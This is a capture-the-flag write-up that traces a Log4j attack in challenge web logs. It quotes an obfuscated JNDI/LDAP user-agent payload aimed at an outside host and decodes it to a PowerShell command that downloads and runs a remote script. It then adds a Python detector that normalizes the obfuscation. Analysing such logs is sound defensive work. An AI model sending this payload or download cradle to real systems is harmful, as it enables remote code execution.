Statement: We implemented a basic IPS to help protect our site from new attacks.

Somehow, a newer more sophisticated version of a regularly observed attack was successfully executed against the website.

What is the name of the script that was run?

Flag format: Name of the script that was run, case sensitive.


The challenge provides a JSON file containing logs.

These logs and scenarios are designed to be real-ish: they are simpler than production data, and since the entire data set covers 1 hr, all malicious activity is conducted on a condensed time frame.

Searching the logs, I notice that a Log4j exploit has been performed:

{
    "_time": "2021-01-01T09:29:13.000+0000",
    "origin": "119.17.132.75",
    "site": "shop.downunderctf.com",
    "method": "GET",
    "referer": "shop.downunderctf.com/register",
    "useragent": "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://41.108.181.141:5552/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWV4ZWMgYnlwYXNzIC1DICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vZG93bnVuZGVyY3RmLmNvbS9wVENOcDVwNkxQMGQ3cUE3N3l2YjRTSGY0MCcpOyI=}",
    "url": "shop.downunderctf.com/Login",
    "logSource": "Http:Web"
}

The payload is base64-encoded, so I will decode it to read the content and get the name of the script:

echo "cG93ZXJzaGVsbC5leGUgLWV4ZWMgYnlwYXNzIC1DICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vZG93bnVuZGVyY3RmLmNvbS9wVENOcDVwNkxQMGQ3cUE3N3l2YjRTSGY0MCcpOyI=" | base64 -d

Decoded payload:

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://downunderctf.com/pTCNp5p6LP0d7qA77yvb4SHf40');"
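As an added example (not part of the original writeup), the two manual steps above as a small Python detector: it resolves the ${::-x} default-value lookups used to hide the jndi: keyword, flags every log field that then contains a JNDI lookup, and decodes the base64 command carried in the LDAP URL to recover the script name. The sample records are constructed in the shape of the challenge's JSON file; the first carries the payload quoted above, the second is an invented benign request.

```python
import base64
import json
import re

# Constructed sample in the shape of the challenge's JSON log file: record one carries the
# obfuscated Log4j payload quoted in the writeup, record two is ordinary (invented) traffic.
SAMPLE_LOGS = json.loads(r'''[
 {"_time": "2021-01-01T09:29:13.000+0000", "origin": "119.17.132.75", "url": "shop.downunderctf.com/Login",
  "useragent": "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://41.108.181.141:5552/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWV4ZWMgYnlwYXNzIC1DICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vZG93bnVuZGVyY3RmLmNvbS9wVENOcDVwNkxQMGQ3cUE3N3l2YjRTSGY0MCcpOyI=}"},
 {"_time": "2021-01-01T09:30:01.000+0000", "origin": "10.1.2.3", "url": "shop.downunderctf.com/", "useragent": "Mozilla/5.0"}
]''')

INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")       # a lookup with nothing nested inside it
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)      # what remains once the obfuscation is stripped
B64_CMD = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")  # command embedded in the LDAP URL path
DOWNLOAD = re.compile(r"DownloadString\('([^']+)'\)")

def _resolve(body: str) -> str:
    """Log4j lookup syntax is ${name:key:-default}; an undefined name yields the default."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    return "${" + body + "}"  # no default: keep the lookup (e.g. ${jndi:...}) for the detector

def normalize_lookups(s: str, max_rounds: int = 50) -> str:
    """Resolve default-value lookups from the inside out until the string stops changing."""
    for _ in range(max_rounds):
        new = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), s)
        if new == s:
            return s
        s = new
    return s

def analyze(logs: list) -> list:
    """One finding per string field that, after normalization, contains a JNDI lookup."""
    findings = []
    for rec in logs:
        for field, value in rec.items():
            norm = normalize_lookups(str(value))
            if not JNDI.search(norm):
                continue
            finding = {"time": rec.get("_time"), "origin": rec.get("origin"), "field": field, "normalized": norm}
            b64 = B64_CMD.search(norm)
            if b64:
                cmd = base64.b64decode(b64.group(1)).decode("utf-8", "replace")
                url = DOWNLOAD.search(cmd)
                finding["command"] = cmd
                finding["script"] = url.group(1).rsplit("/", 1)[-1] if url else None
            findings.append(finding)
    return findings
```

Calling analyze(SAMPLE_LOGS) returns a single finding for the useragent field of the first record, with the decoded PowerShell command and the script name; only lookups that carry a :-default are resolved, so other Log4j obfuscation forms such as ${lower:j} would need their own handlers.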

Flag: pTCNp5p6LP0d7qA77yvb4SHf40